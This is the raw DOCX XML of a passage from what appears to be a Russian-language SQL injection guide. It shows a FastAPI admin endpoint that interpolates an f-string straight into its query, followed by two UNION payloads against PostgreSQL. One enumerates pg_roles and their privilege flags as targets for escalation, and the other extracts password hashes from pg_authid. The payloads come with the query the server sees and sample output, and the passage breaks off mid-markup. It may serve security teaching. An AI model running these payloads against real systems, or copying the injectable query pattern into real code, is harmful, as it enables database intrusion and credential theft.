        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D7B501" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>from sqlalchemy.ext.asyncio import AsyncSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F479778" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388AA199"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39663D9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225620AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D305D9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23846F43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAD104B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/admin/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56D481" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_admin_users(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2328BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    role_filter: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DEA643"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059D3CBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C302E25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F673B93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"SELECT id, username, last_login FROM admin_users WHERE role = '{role_filter}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1665533E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48372706"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06E0DF2F"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BDEC4EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Три колонки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timestamp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — типы как раз под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>oid::int / rolname / rolvaliduntil</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C356A14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — `pg_roles` (без superuser, без хешей)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18333ABD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это то, что атакующий получает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> эскалации. Хешей нет, но видны имена всех ролей кластера и их флаги — карта целей для 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0061245A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `role_filter`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC534F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, rolname || ' [super=' || rolsuper || ' replication=' || rolreplication || ' bypassrls=' || rolbypassrls || ' createrole=' || rolcreaterole || ']', rolvaliduntil FROM pg_roles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D4C389" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E2BB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, username, last_login FROM admin_users WHERE role = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C02097" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAF062B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolname || ' [super=' || rolsuper || ' replication=' || rolreplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C53C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            || ' bypassrls=' || rolbypassrls || ' createrole=' || rolcreaterole || ']',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48769697" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolvaliduntil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087BF986" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_roles --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172034EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP-ответа — все роли кластера с их ключевыми флагами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499AC76E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres [super=true replication=true bypassrls=true createrole=true]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1994E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>appwriter [super=false replication=false bypassrls=false createrole=false]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C33713" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>appreader [super=false replication=false bypassrls=false createrole=false]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A24C9C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>backup_op [super=false replication=true bypassrls=false createrole=false]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D3355" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>analytics [super=false replication=false bypassrls=true createrole=false]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6286F029" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Что это даёт атакующему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> superuser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB83C25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Точное имя superuser-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (обычно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но на managed — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t>, специальные на Supabase). Цель для 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE83CD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Роли с `bypassrls = true`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обходят RLS-политики (3.17), в эти роли стоит SET ROLE если получится.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7214FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Роли с `replication = true`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — могут читать всё через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_basebackup</w:t>
      </w:r>
      <w:r>
        <w:t>/логическую репликацию, минуя обычные права таблиц.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029BF971" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Роли с `createrole = true`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — могут создавать новые роли и наследовать их (один из векторов 3.13).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BD1B20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`rolvaliduntil` в прошлом</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — роль с истёкшим паролем, но не удалённая — индикатор orphaned-аккаунта (часто бывший сотрудник), которым легче «угнать» (если есть способ сбросить пароль).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C66182" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что это view, спроектированный для self-introspection: приложения и ORM запрашивают «какие роли у меня есть» без необходимости в superuser. Колонка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в view-определении заменена на литерал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'********'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — даже SUPERUSER через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хешей не увидит, ему нужно идти в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую (Payload B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3697A2A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — `pg_authid.rolpassword` (после получения SUPERUSER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7246AB44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эта карточка применима </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>после</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> успешной эскалации (3.13). До неё запрос вернёт ошибку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>permission denied for table pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это сам по себе сигнал, что текущая роль не superuser (и что лимит инъекции — application-роль).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C253310" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `role_filter`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A249AE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, rolname || ' :: ' || COALESCE(rolpassword, '&lt;no-password&gt;'), rolvaliduntil FROM pg_authid WHERE rolcanlogin = true --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495711DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5540D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, username, last_login FROM admin_users WHERE role = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA59E72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC5E8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolname || ' :: ' || COALESCE(rolpassword, '&lt;no-password&gt;'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1683E040" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
